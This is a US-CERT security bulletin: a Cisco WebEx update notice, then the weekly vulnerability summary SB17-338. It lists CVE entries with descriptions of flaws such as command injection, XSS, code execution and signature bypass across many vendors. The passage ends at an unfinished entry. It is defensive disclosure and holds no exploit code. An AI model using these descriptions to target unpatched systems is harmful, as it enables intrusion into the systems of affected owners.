
Cisco Releases Security Updates

Original release date: November 29, 2017

Cisco has released security updates to address vulnerabilities in its WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review the Cisco Security Advisory and apply the necessary updates.


This product is provided subject to this Notification and this Privacy & Use policy.



SB17-338: Vulnerability Summary for the Week of November 27, 2017

Original release date: December 04, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.


High Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

There were no high vulnerabilities recorded this week.


Medium Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

cisco -- webex_meeting_center
  Description: A vulnerability in Cisco WebEx Meeting Center could allow an authenticated, remote attacker to initiate connections to arbitrary hosts, aka a "URL Redirection Vulnerability." The vulnerability is due to insufficient access control for HTTP traffic directed to the Cisco WebEx Meeting Center. An attacker could exploit this vulnerability by sending a malicious URL to the Cisco WebEx Meeting Center. An exploit could allow the attacker to connect to arbitrary hosts. Cisco Bug IDs: CSCvf63843.
  Published: 2017-11-30
  CVSS Score: 4.0
  Source & Patch Info: CVE-2017-12297 (BID, SECTRACK, CONFIRM)

cisco -- webex_meeting_center
  Description: A Buffer Overflow vulnerability in Cisco WebEx Network Recording Player for Advanced Recording Format (.arf) files could allow an attacker to execute arbitrary code on a system. An attacker could exploit this vulnerability by providing a user with a malicious .arf file via email or URL and convincing the user to launch the file. Exploitation of this vulnerability could allow arbitrary code execution on the system of the targeted user. This vulnerability affects Cisco WebEx Business Suite meeting sites, Cisco WebEx Meetings sites, Cisco WebEx Meetings Server, and Cisco WebEx ARF players. Cisco Bug IDs: CSCve10729, CSCve10771, CSCve10779, CSCve11521, CSCve11543.
  Published: 2017-11-30
  CVSS Score: 4.3
  Source & Patch Info: CVE-2017-12359 (CONFIRM)

cisco -- webex_meeting_center
  Description: A vulnerability in Cisco WebEx Network Recording Player for WebEx Recording Format (WRF) files could allow an attacker to cause a denial of service (DoS) condition. An attacker could exploit this vulnerability by providing a user with a malicious WRF file via email or URL and convincing the user to open the file. A successful exploit could cause an affected player to crash, resulting in a DoS condition. This vulnerability affects Cisco WebEx Business Suite meeting sites, Cisco WebEx Meetings sites, and Cisco WebEx WRF players. Cisco Bug IDs: CSCve30294, CSCve30301.
  Published: 2017-11-30
  CVSS Score: 4.3
  Source & Patch Info: CVE-2017-12360 (BID, CONFIRM)

cisco -- webex_meeting_center
  Description: A vulnerability in Cisco WebEx Event Center could allow an authenticated, remote attacker to view unlisted meeting information. The vulnerability is due to a design flaw in the product. An attacker could execute a query on an Event Center site to view scheduled meetings. A successful query would show both listed and unlisted meetings in the displayed information. An attacker could use this information to attend meetings that are not available for their attendance. Cisco Bug IDs: CSCvg33629.
  Published: 2017-11-30
  CVSS Score: 4.0
  Source & Patch Info: CVE-2017-12365 (BID, SECTRACK, CONFIRM)

cisco -- webex_meeting_center
  Description: A vulnerability in Cisco WebEx Meeting Center could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of an affected system. The vulnerability is due to insufficient input validation of some parameters that are passed to the web server of the affected system. An attacker could exploit this vulnerability by convincing a user to follow a malicious link or by intercepting a user request and injecting malicious code into the request. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected web interface or allow the attacker to access sensitive browser-based information. Cisco Bug IDs: CSCvf78635, CSCvg52440.
  Published: 2017-11-30
  CVSS Score: 4.3
  Source & Patch Info: CVE-2017-12366 (BID, SECTRACK, CONFIRM)

cisco -- webex_meetings_server
  Description: A vulnerability in Cisco WebEx Meeting Server could allow an unauthenticated, remote attacker to modify the welcome message of a meeting on an affected system. The vulnerability is due to insufficient security settings on meetings. An attacker could exploit this vulnerability by modifying the welcome message to a meeting. A successful exploit could allow the attacker to modify the welcome message of any known meeting. Cisco Bug IDs: CSCvf68695.
  Published: 2017-11-30
  CVSS Score: 5.0
  Source & Patch Info: CVE-2017-12363 (BID, SECTRACK, CONFIRM)


Low Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

There were no low vulnerabilities recorded this week.


Severity Not Yet Assigned

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
adobe -- coldfusion
  Description: Adobe ColdFusion has a cross-site scripting (XSS) vulnerability. This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-11285 (BID, SECTRACK, CONFIRM)

adobe -- coldfusion
  Description: Adobe ColdFusion has an XML external entity (XXE) injection vulnerability. This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-11286 (BID, SECTRACK, CONFIRM)

adobe -- coldfusion
  Description: Adobe ColdFusion has an Untrusted Data Deserialization vulnerability. This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-11283 (BID, SECTRACK, CONFIRM)

adobe -- coldfusion
  Description: Adobe ColdFusion has an Untrusted Data Deserialization vulnerability. This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-11284 (BID, SECTRACK, CONFIRM)
adobe -- flash
  Description: Adobe Flash Player has an exploitable memory corruption vulnerability in the MP4 atom parser. Successful exploitation could lead to arbitrary code execution. This affects 26.0.0.151 and earlier.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-11282 (BID, SECTRACK, CONFIRM, GENTOO, EXPLOIT-DB)

adobe -- flash
  Description: Adobe Flash Player has an exploitable memory corruption vulnerability in the text handling function. Successful exploitation could lead to arbitrary code execution. This affects 26.0.0.151 and earlier.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-11281 (BID, SECTRACK, CONFIRM, GENTOO, EXPLOIT-DB, EXPLOIT-DB)
adobe -- robohelp
  Description: Adobe RoboHelp has an Open Redirect vulnerability. This affects versions before RH12.0.4.460 and RH2017 before RH2017.0.2.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-3105 (BID, SECTRACK, CONFIRM)

adobe -- robohelp
  Description: Adobe RoboHelp has a cross-site scripting (XSS) vulnerability. This affects versions before RH12.0.4.460 and RH2017 before RH2017.0.2.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-3104 (BID, SECTRACK, CONFIRM)
apache -- cxf_fediz
  Description: Apache CXF Fediz ships with a number of container-specific plugins to enable WS-Federation for applications. A CSRF (Cross Site Request Forgery) style vulnerability has been found in the Spring 2, Spring 3 and Spring 4 plugins in versions before 1.4.3 and 1.3.3. The vulnerability can result in a security context that is set up using a malicious client's roles for the given end user.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12631 (MLIST)

apache -- qpid_broker-j
  Description: In Apache Qpid Broker-J before 6.1.x before 6.1.5, the broker does not properly enforce a maximum frame size in AMQP 1.0 frames. A remote unauthenticated attacker could exploit this to cause the broker to exhaust all available memory and eventually terminate. Older AMQP protocols are not affected.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-15701 (CONFIRM, MLIST, CONFIRM)

apache -- qpid_broker-j
  Description: In Apache Qpid Broker-J 0.18 through 0.32, if the broker is configured with different authentication providers on different ports, one of which is an HTTP port, then the broker can be tricked by a remote unauthenticated attacker connecting to the HTTP port into using an authentication provider that was configured on a different port. The attacker still needs valid credentials with the authentication provider on the spoofed port. This becomes an issue when the spoofed port has weaker authentication protection (e.g., anonymous access, default accounts) and is normally protected by firewall rules or similar, which can be circumvented by this vulnerability. AMQP ports are not affected. Versions 6.0.0 and newer are not affected.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-15702 (CONFIRM, MLIST, CONFIRM)

apache -- struts
  Description: In Apache Struts 2.5 to 2.5.14, the REST Plugin is using an outdated JSON-lib library which is vulnerable and allows a DoS attack using a malicious request with a specially crafted JSON payload.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-15707 (SECTRACK, CONFIRM)
apple -- macos_high_sierra
  Description: An issue was discovered in certain Apple products. macOS High Sierra before Security Update 2017-001 is affected. The issue involves the "Directory Utility" component. It allows attackers to obtain administrator access without a password via certain interactions involving entry of the root user name.
  Published: 2017-11-29
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-13872 (BID, SECTRACK, MISC, MISC, MISC, MISC)

arq -- arq
  Description: The setpermissions function in the auto-updater in Arq before 5.9.7 for Mac allows local users to gain root privileges via a symlink attack on the updater binary itself.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-15357 (MISC, CONFIRM)

arq -- multiple_products
  Description: The (1) arq_updater, (2) arqcommitter, (3) standardrestorer, (4) arqglacierrestorer, and (5) arqs3glacierrestorer helper apps in Arq 5.x before 5.10 for Mac allow local users to gain root privileges via a crafted data packet.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-16895 (MISC, CONFIRM)
atlassian -- hipchat
  Description: The Hipchat for Mac desktop client is vulnerable to client-side remote code execution via video call link parsing. Hipchat for Mac desktop clients at or above version 4.0 and before version 4.30 are affected by this vulnerability.
  Published: 2017-11-27
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-14586 (BID, CONFIRM, CONFIRM)

atlassian -- hipchat
  Description: A Server Side Request Forgery (SSRF) vulnerability could lead to remote code execution for authenticated administrators. This issue was introduced in version 2.2.0 of Hipchat Server and version 3.0.0 of Hipchat Data Center. Versions of Hipchat Server starting with 2.2.0 and before 2.2.6 are affected by this vulnerability. Versions of Hipchat Data Center starting with 3.0.0 and before 3.1.0 are affected.
  Published: 2017-11-27
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-14585 (BID, CONFIRM, CONFIRM)

atlassian -- multiple_products
  Description: Atlassian Fisheye and Crucible versions less than 4.4.3 and version 4.5.0 are vulnerable to argument injection through filenames in Mercurial repositories, allowing attackers to execute arbitrary code on a system running the impacted software.
  Published: 2017-11-29
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-14591 (CONFIRM)
aubio -- aubio
  Description: In aubio 0.4.6, a divide-by-zero error exists in the function new_aubio_source_wavread() in source_wavread.c, which may lead to DoS when playing a crafted audio file.
  Published: 2017-11-29
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-17054 (MISC)

b3log/symphony -- b3log/symphony
  Description: b3log Symphony (aka Sym) 2.2.0 allows an XSS attack by sending a private letter with a certain /article URI, and a second private letter with a modified title.
  Published: 2017-11-27
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-16956 (CONFIRM)

bazaar -- bazaar
  Description: Bazaar through 2.7.0, when Subprocess SSH is used, allows remote attackers to execute arbitrary commands via a bzr+ssh URL with an initial dash character in the hostname, a related issue to CVE-2017-9800, CVE-2017-12836, CVE-2017-12976, CVE-2017-16228, CVE-2017-1000116, and CVE-2017-1000117.
  Published: 2017-11-27
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-14176 (CONFIRM, CONFIRM, CONFIRM, CONFIRM, CONFIRM, CONFIRM, DEBIAN)

bigtree -- bigtree_cms
  Description: A SQL injection vulnerability in core/inc/auto-modules.php in BigTree CMS through 4.2.19 allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database. The attack uses an admin/trees/add/process request with a crafted _tags[] parameter that is mishandled in a later admin/ajax/dashboard/approve-change request.
  Published: 2017-11-27
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-16961 (MISC)

bluemotion -- ohmibod
  Description: The OhMiBod Remote app for Android and iOS allows remote attackers to impersonate users by sniffing network traffic for search responses from the OhMiBod API server and then editing the username, user_id, and token fields in data/data/com.ohmibod.remote2/shared_prefs/OMB.xml.
  Published: 2017-12-01
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-14487 (MISC)
cisco -- application_policy_infrastructure_controllers
  Description: A vulnerability in certain system script files that are installed at boot time on Cisco Application Policy Infrastructure Controllers could allow an authenticated, local attacker to gain elevated privileges and execute arbitrary commands with root privileges on an affected host operating system. The vulnerability is due to insufficient validation of user-controlled input that is supplied to certain script files of an affected system. An attacker could exploit this vulnerability by submitting crafted input to a script file on an affected system. A successful exploit could allow the attacker to gain elevated privileges and execute arbitrary commands with root privileges on the affected system. To exploit this vulnerability, the attacker would need to authenticate to the affected system by using valid administrator credentials. Cisco Bug IDs: CSCvf57274.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12352 (BID, SECTRACK, CONFIRM)

cisco -- asynchos_software
  Description: A vulnerability in the Multipurpose Internet Mail Extensions (MIME) scanner of Cisco AsyncOS Software for Cisco Email Security Appliances (ESA) could allow an unauthenticated, remote attacker to bypass configured user filters on the device. The vulnerability is due to improper error handling of a malformed MIME header in an email attachment. An attacker could exploit this vulnerability by sending an email with a crafted MIME attachment. For example, a successful exploit could allow the attacker to bypass configured user filters to drop the email. The malformed MIME headers may not be RFC compliant. However, some mail clients could still allow users to access the attachment, which may not have been properly filtered by the device. Cisco Bug IDs: CSCvf44666.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12353 (BID, SECTRACK, CONFIRM)
cisco -- data_center_network_manager
  Description: Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) Software could allow a remote attacker to inject arbitrary values into DCNM configuration parameters, redirect a user to a malicious website, inject malicious content into a DCNM client interface, or conduct a cross-site scripting (XSS) attack against a user of the affected software. Cisco Bug IDs: CSCvf40477, CSCvf63150, CSCvf68218, CSCvf68235, CSCvf68247.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12347 (BID, CONFIRM)

cisco -- data_center_network_manager
  Description: Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) Software could allow a remote attacker to inject arbitrary values into DCNM configuration parameters, redirect a user to a malicious website, inject malicious content into a DCNM client interface, or conduct a cross-site scripting (XSS) attack against a user of the affected software. Cisco Bug IDs: CSCvf40477, CSCvf63150, CSCvf68218, CSCvf68235, CSCvf68247.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12343 (BID, CONFIRM)

cisco -- data_center_network_manager
  Description: Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) Software could allow a remote attacker to inject arbitrary values into DCNM configuration parameters, redirect a user to a malicious website, inject malicious content into a DCNM client interface, or conduct a cross-site scripting (XSS) attack against a user of the affected software. Cisco Bug IDs: CSCvf40477, CSCvf63150, CSCvf68218, CSCvf68235, CSCvf68247.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12345 (BID, CONFIRM)

cisco -- data_center_network_manager
  Description: Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) Software could allow a remote attacker to inject arbitrary values into DCNM configuration parameters, redirect a user to a malicious website, inject malicious content into a DCNM client interface, or conduct a cross-site scripting (XSS) attack against a user of the affected software. Cisco Bug IDs: CSCvf40477, CSCvf63150, CSCvf68218, CSCvf68235, CSCvf68247.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12344 (BID, CONFIRM)

cisco -- data_center_network_manager
  Description: Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) Software could allow a remote attacker to inject arbitrary values into DCNM configuration parameters, redirect a user to a malicious website, inject malicious content into a DCNM client interface, or conduct a cross-site scripting (XSS) attack against a user of the affected software. Cisco Bug IDs: CSCvf40477, CSCvf63150, CSCvf68218, CSCvf68235, CSCvf68247.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12346 (BID, CONFIRM)
cisco -- firepower_extensible_operating_system_and_nx-os
  Description: A vulnerability in the CLI of Cisco Firepower Extensible Operating System (FXOS) and NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. The vulnerability is due to insufficient input validation of command arguments to the CLI parser. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command. An exploit could allow the attacker to execute arbitrary commands at the user's privilege level. On products that support multiple virtual device contexts (VDCs), this vulnerability could allow the attacker to execute commands at the user's privilege level outside the user's environment. This vulnerability affects the following products running Cisco FXOS or NX-OS System Software: Firepower 4100 Series Next-Generation Firewall, Firepower 9300 Security Appliance, Multilayer Director Switches, Nexus 1000V Series Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Unified Computing System Manager. Cisco Bug IDs: CSCve51700, CSCve93833, CSCve93860, CSCve93863, CSCve93864, CSCve93880.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12329 (BID, SECTRACK, CONFIRM)

cisco -- ios_xr
  Description: A vulnerability in the Local Packet Transport Services (LPTS) ingress frame-processing functionality of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause one of the LPTS processes on an affected system to restart unexpectedly, resulting in a brief denial of service (DoS) condition. The vulnerability is due to incomplete LPTS frame validation by the affected software. An attacker could exploit this vulnerability by sending crafted XML requests to the management interface of an affected system. A successful exploit could allow the attacker to cause one of the LPTS processes on the affected system to restart unexpectedly, which would impact LPTS traffic and cause a brief DoS condition while the process restarts. Cisco Bug IDs: CSCvf76332.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12355 (BID, SECTRACK, CONFIRM)

cisco -- ip_phone_8800_series_devices
  Description: A vulnerability in Session Initiation Protocol (SIP) call handling in Cisco IP Phone 8800 Series devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition because the SIP process unexpectedly restarts. All active phone calls are dropped as the SIP process restarts. The vulnerability is due to incomplete input validation of the SIP packet header. An attacker could exploit this vulnerability by sending a malformed SIP packet to a targeted phone. An exploit could allow the attacker to cause a DoS condition because all phone calls are dropped when the SIP process unexpectedly restarts. Cisco Bug IDs: CSCvc62590.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12328 (BID, SECTRACK, CONFIRM)
cisco -- jabber
  Description: A vulnerability in the web-based management interface of Cisco Jabber for Windows, Mac, Android, and iOS could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information. Cisco Bug IDs: CSCvf79080, CSCvf79088.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12358 (BID, CONFIRM)

cisco -- jabber
  Description: A vulnerability in the web-based management interface of Cisco Jabber for Windows, Mac, Android, and iOS could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information. Cisco Bug IDs: CSCvf50378, CSCvg56018.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12356 (BID, SECTRACK, CONFIRM)

cisco -- jabber
  Description: A vulnerability in Cisco Jabber for Windows could allow an unauthenticated, local attacker to access sensitive communications made by the Jabber client. An attacker could exploit this vulnerability to gain information to conduct additional attacks. The vulnerability is due to the way Cisco Jabber for Windows handles random number generation for file folders. An attacker could exploit the vulnerability by fixing the random number data used to establish Secure Sockets Layer (SSL) connections between clients. An exploit could allow the attacker to decrypt secure communications made by the Cisco Jabber for Windows client. Cisco Bug IDs: CSCve44806.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12361 (BID, SECTRACK, CONFIRM)

cisco -- meeting_server
  Description: A vulnerability in Cisco Meeting Server versions prior to 2.2.2 could allow an authenticated, remote attacker to cause the system to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to video calls being made on systems with a particular configuration. An attacker could exploit this by knowing a valid URI that directs to a Cisco Meeting Server. An attacker could then make a video call and cause the system to reload. Cisco Bug IDs: CSCve65931.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12362 (BID, SECTRACK, CONFIRM)
cisco -- nexus_series_switches
  Description: A vulnerability in the Open Agent Container (OAC) feature of Cisco Nexus Series Switches could allow an unauthenticated, local attacker to read and send packets outside the scope of the OAC. The vulnerability is due to insufficient internal security measures in the OAC feature. An attacker could exploit this vulnerability by crafting specific packets for communication on the device-internal network. A successful exploit could allow the attacker to run code on the underlying host operating system. OAC is not enabled by default. For a device to be vulnerable, an administrator would need to install and activate this feature. This vulnerability affects the following Cisco Nexus Series Switches: Nexus 2000 Series Fabric Extenders, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches. Cisco Bug IDs: CSCve53542, CSCvf36621.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12342 (SECTRACK, CONFIRM)

cisco -- nx_os
  Description: A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. The vulnerability is due to insufficient input validation of command arguments to the CLI parser. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command and gaining unauthorized access to the underlying operating system of the device. An exploit could allow the attacker to execute arbitrary commands at the user's privilege level. On products that support multiple virtual device contexts (VDCs), this vulnerability could allow an attacker to execute commands at the user's privilege level outside the user's environment. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules. Cisco Bug IDs: CSCve99902, CSCvf14879.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12330 (BID, SECTRACK, CONFIRM)

cisco -- nx_os
  Description: A vulnerability in the guest shell feature of Cisco NX-OS System Software could allow an authenticated, local attacker to read and send packets outside the scope of the guest shell container. An attacker would need valid administrator credentials to perform this attack. The vulnerability is due to insufficient internal security measures in the guest shell feature. An attacker could exploit this vulnerability by sending or receiving packets on the device-internal network outside of the guest shell container, aka "Unauthorized Internal Interface Access." This vulnerability affects the following products running Cisco NX-OS System Software: Nexus 3000 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules. Cisco Bug IDs: CSCvf33038.
  Published: 2017-11-30
  CVSS Score: not yet calculated
  Source & Patch Info: CVE-2017-12351 (BID, SECTRACK, CONFIRM)
cisco -- nx_os
 
A vulnerability in Cisco NX-OS System Software could allow an authenticated, local attacker to bypass signature verification when loading a software patch. The vulnerability is due to insufficient NX-OS signature verification for software patches. An authenticated, local attacker could exploit this vulnerability to bypass signature verification and load a crafted, unsigned software patch on a targeted device. The attacker would need valid administrator credentials to perform this exploit. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Unified Computing System Manager. Cisco Bug IDs: CSCvf16494, CSCvf23655.2017-11-30not yet calculatedCVE-2017-12331
SECTRACK
CONFIRM
cisco -- nx_os
 
A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. An attacker would need valid administrator credentials to perform this exploit. The vulnerability is due to insufficient input validation during the installation of a software patch. An attacker could exploit this vulnerability by installing a crafted patch image with the vulnerable operation occurring prior to patch activation. An exploit could allow the attacker to execute arbitrary commands on an affected system as root. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Unified Computing System Manager. Cisco Bug IDs: CSCvf23735, CSCvg04072.2017-11-30not yet calculatedCVE-2017-12341
SECTRACK
CONFIRM
cisco -- nx_os
 
A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. An attacker would need valid administrator credentials to perform this exploit. The vulnerability is due to insufficient input validation of command arguments. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command. An exploit could allow the attacker to execute arbitrary commands as root. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Unified Computing System Manager. Cisco Bug IDs: CSCvf15113, CSCvf15122, CSCvf15125, CSCvf15131, CSCvf15143, CSCvg04088.2017-11-30not yet calculatedCVE-2017-12334
SECTRACK
CONFIRM
cisco -- nx_os
 
A vulnerability in Cisco NX-OS System Software could allow an authenticated, local attacker to bypass signature verification when loading a software image. The vulnerability is due to insufficient NX-OS signature verification for software images. An authenticated, local attacker could exploit this vulnerability to bypass signature verification and load a crafted, unsigned software image on a targeted device. The attacker would need valid administrator credentials to perform this exploit. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Unified Computing System Manager. Cisco Bug IDs: CSCvf25045, CSCvf31495.2017-11-30not yet calculatedCVE-2017-12333
SECTRACK
CONFIRM
cisco -- nx_os
A vulnerability in Cisco NX-OS System Software patch installation could allow an authenticated, local attacker to write a file to arbitrary locations. The vulnerability is due to insufficient restrictions in the patch installation process. An attacker could exploit this vulnerability by installing a crafted patch image on an affected device. The vulnerable operation occurs prior to patch activation. An exploit could allow the attacker to write arbitrary files on an affected system as root. The attacker would need valid administrator credentials to perform this exploit. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Unified Computing System Manager. Cisco Bug IDs: CSCvf16513, CSCvf23794, CSCvf23832. | 2017-11-30 | not yet calculated | CVE-2017-12332
SECTRACK
CONFIRM
cisco -- nx_os
A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. The vulnerability is due to insufficient input validation of command arguments to the CLI parser. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command. An exploit could allow the attacker to execute arbitrary commands at the user's privilege level. On products that support multiple virtual device contexts (VDCs), this vulnerability could allow the attacker to execute commands at the user's privilege level outside the user's environment. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode, Nexus 9000 Series Switches in standalone NX-OS mode, and Nexus 9500 R-Series Line Cards and Fabric Modules. Cisco Bug IDs: CSCve99925, CSCvf15164, CSCvf15167, CSCvf15170, CSCvf15173. | 2017-11-30 | not yet calculated | CVE-2017-12339
SECTRACK
CONFIRM
cisco -- nx_os
